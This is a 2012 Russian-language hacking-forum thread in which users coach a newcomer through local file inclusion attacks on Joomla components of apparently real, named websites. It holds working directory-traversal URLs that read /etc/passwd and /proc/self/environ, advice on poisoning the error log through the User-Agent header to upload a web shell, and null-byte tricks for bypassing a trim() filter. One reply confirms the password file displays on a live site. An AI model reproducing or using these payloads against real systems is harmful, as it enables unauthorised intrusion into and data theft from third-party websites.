ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.04.2012, 00:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от kise
kise said:
Можно ли как-то залить шелл?
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ
У вас в конце нулл-байт отвалился. Что касается шелла, то, по идее, права у вас есть. Но я бы попробовал залить вот сюда
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/fd/2%00[/COLOR][/COLOR]
(лог ошибок).
Как это сделать? Путем формирования User-Agent'а, примерно такого вида:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|
|
01.04.2012, 00:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
Спасибо! Если можно, то объясните что значат всякие буквы после proc? Насколько помню, там хранятся логи, которые постоянно обновляются.
И кстати, как можно обойти эту расчлененку? Режутся слеши и нулевой байт.
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&It emid=30&controller=../../../../../../../../../etc/passwd
|
|
|
|
01.04.2012, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от kise
kise said:
Спасибо! Если можно, то объясните что значат всякие буквы после proc? Насколько помню, там хранятся логи, которые постоянно обновляются.
И кстати, как можно обойти эту
расчлененку
? Режутся слеши и нулевой байт.
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&It emid=30&controller=../../../../../../../../../etc/passwd
Я бы с удовольствием объяснил, но из меня никудышный педагог Я могу накидать вам список статей по локальному PHP инклуду в личку, если понадобится, но вообще это все легко гуглится по запросу "/proc/self/environ инклуд", и уже на первой странице выдачи вы найдете всю информацию.
Удачи.
|
|
|
|
01.04.2012, 01:00
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от kise
kise said:
Спасибо! Если можно, то объясните что значат всякие буквы после proc? Насколько помню, там хранятся логи, которые постоянно обновляются.
И кстати, как можно обойти эту
расчлененку
? Режутся слеши и нулевой байт.
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&It emid=30&controller=../../../../../../../../../etc/passwd
После /proc это не логи и ничего похожего на них. В ряде unix систем /proc - это виртуальная файловая система представляющая собой интерфейс для динамической работы с ядром.
|
|
|
01.04.2012, 01:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
А как обойти это расчленение?
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&It emid=30&controller=../../../../../../../../../etc/passwd
|
|
|
|
01.04.2012, 01:10
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от kise
kise said:
А как обойти это расчленение?
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&It emid=30&controller=../../../../../../../../../etc/passwd
Попробуйте поискать уязвимости в других скриптах этого сайта. Может статься так, что какой-либо фильтр не дает произвести требуемую операцию. Так-же можно попробовать переопределение переменных в случае register_globals On. Но так как там хостинг, то последний вариант маловероятен.
|
|
|
|
01.04.2012, 01:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.
Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%00
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%000
|
|
|
|
01.04.2012, 01:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от kise
kise said:
Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.
Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%00
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%000
Вы углубляетесь в детали После успешно проведенной атаки и заливки шелла(я нисколько не сомневаюсь, чтобы потом уведомить админов уязвимого ресурса о бреши в их защите ), многие вопросы отпадут сами собой - практика лучше всего. Что касается вашего вопроса про %00 - просто примите это как данность. Нулл-байт(ядовитый нуль, 0x00) пришел из мира C/C++ и означает конец строки.
|
|
|
|
01.04.2012, 01:26
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от kise
kise said:
Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.
Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%00
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%000
Да действительно. Фильтр очень ограниченный и явно самопальный работает. Не происходит подстановка в варианте с %000 потому что фильтр не воспринимает как null-byte.
Вообще ,в данном случае ,редкая криворукость программиста играет нам на руку. Так как %000 обрабатывается php как %00 и усечение все-же происходит. Ошибку выдает потому, что нет прав на виртуальную файловую систему.
Но запрос вида http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../etc/passwd%000 успешно отображает passwd.
|
|
|
|
01.04.2012, 02:01
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Cennarios
Cennarios said:
Да действительно. Фильтр очень ограниченный и явно самопальный работает. Не происходит подстановка в варианте с %000 потому что фильтр не воспринимает как null-byte.
Вообще ,в данном случае ,редкая криворукость программиста играет нам на руку. Так как %000 обрабатывается php как %00 и усечение все-же происходит. Ошибку выдает потому, что нет прав на виртуальную файловую систему.
Но запрос вида http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../etc/passwd%000 успешно отображает passwd.
Причем тут фильтр?
Там банально идет trim(), который убирает нульбайт, если он идет в конце строки, поэтому правильнее всегда после нульбайта подставлять символ какой-нибудь.
Фильтры, ага. =\
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
